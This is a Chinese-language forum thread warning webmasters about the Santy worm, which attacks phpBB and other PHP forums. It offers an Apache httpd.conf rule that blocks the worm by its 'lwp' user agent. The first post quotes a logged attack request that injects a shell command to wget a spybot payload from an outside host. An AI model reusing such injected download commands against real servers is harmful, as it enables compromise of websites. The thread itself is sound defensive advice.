校長兼撞鐘 | 【病毒】以 PHP 架設論壇者請注意 Net-Worm.Perl.Santy.a (apache server 擋該支蟲的方法) 有一支病毒主要是攻擊 phpbb ellery 已經發表 : 未更新 phpBB 到 2.0.11 者請注意 不過此病毒並非只針對 phpbb , 同樣也會嘗試攻擊 phpbb 其他論壇程式 且此病毒主要是以 Google! 搜尋資料後再前去攻擊 所有以 php 程式架設論壇的網站都會被嘗試攻擊 , 會導致網站流量異常增加 今天我也發現自己的網站流量有異常 檢視 apache server log 檔後會發現許多異常連線 "index.php?s=http://www.visualcoders.net/spy.gif?&cmd=cd%20/tmp;wget%20www.visualcoders.net/spybot....." New computer worm attacks bulletin boards http://www.msnbc.msn.com/id/6742668/ |
回覆 |
校長兼撞鐘 | 在國外網站看到 Apache Web Server 可以用 .htaccess 來阻擋這支蟲 請把下列代碼加入 .htaccess 中即可 引用:
| |
回覆 |
校長兼撞鐘 | 我自己是採用編輯 httpd.conf 在最後一行加入如下內容 PS : /usr/local/www/htdocs = 網站的網頁目錄 語法: SetEnvIfNoCase User-Agent ".*lwp.*" bad_bot <Directory /usr/local/www/htdocs> Options FollowSymLinks AllowOverride All order allow,deny allow from all deny from env=bad_bot </Directory> 幾分鐘後檢查 apache 的 error_log 內容中若有如下內容表示已經檔下該支蟲 "[client 217.172.168.59] client denied by server configuration...." |
回覆 |
♀☆停權中☆♂ | 有架論壇的還真的得隨時注意 |
回覆 |
P C Z O N E 惡 魔 頭 頭 | |
回覆 |
|
類似的主題 | ||||
主題 | 主題作者 | 討論版 | 回覆 | 最後發表 |
【閒聊】50m/500mb BW/PERL/PHP/MYSQL/CP/FTP/singspace.net | aszasz | ☉ -- 免 費 空 間 討 論 版 | 0 | 2005-07-26 09:47 PM |
【新聞】Net-Worm.Perl.Santy.a 威脅著網路討論區 | kaspersky | -- 防 駭 / 防 毒 版 | 1 | 2004-12-22 02:34 PM |
win98+Apache+perl......?? | clw120 | -- 網 路 技 術 版 | 0 | 2002-01-18 03:22 PM |
XML | RSS 2.0 | RSS |
本論壇所有文章僅代表留言者個人意見,並不代表本站之立場,討論區以「即時留言」方式運作,故無法完全監察所有即時留言,若您發現文章可能有異議,請 email :[email protected] 處理。